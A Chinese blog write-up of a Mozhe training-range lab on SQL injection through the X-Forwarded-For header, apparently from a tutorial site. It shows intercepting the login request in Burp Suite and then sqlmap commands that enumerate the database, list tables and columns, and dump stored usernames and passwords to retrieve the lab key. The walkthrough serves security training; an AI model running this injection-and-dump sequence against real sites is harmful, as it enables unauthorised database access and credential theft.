【墨者】X-Forwarded-For注入漏洞实战

发布于:2022-12-21 ⋅ 阅读:(457) ⋅ 点赞:(0)

什么是X-Forwarded-For?

X-Forwarded-ForXFF)是用来识别通过HTTP代理负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。

首先,我们来看一下墨者在线靶场中X-Forwarded-For注入漏洞实战的一个界面

我们可以看到是一个后台管理登录界面

随便输入一个账号密码,使用bp抓包

显示登录失败,以及我们当前IP被记录

将数据包发送到repeater中进行重发,添加XFF并把其值添加为随意IP

重发之后我们发现响应包中的IP也随之改变

我们猜测服务器后端可能是在获取XFF数据

将XFF的IP值后追加 *

将抓取到的数据包放入txt文档中

使用sqlmap进行探测

sqlmap -r /home/kali_lxy/桌面/xff.txt --dbs --batch

获取到数据库名称

继续探测数据库的表

sqlmap -r /home/kali_lxy/桌面/xff.txt -D webcalendar --tables –batch

探测出两个表

继续探测表中的列名

sqlmap -r /home/kali_lxy/桌面/xff.txt -D webcalendar -T user --columns –batch

我们发现有password和username

使用—dump拖库,查看账号密码

sqlmap -r /home/kali_lxy/桌面/xff.txt -D webcalendar -T user -C 'password,username' --dump –batch

成功拿到账号密码

使用账号密码进行登录,即可获得KEY值

本文含有隐藏内容,请 开通VIP 后查看

网站公告

今日签到

点亮在社区的每一天
去签到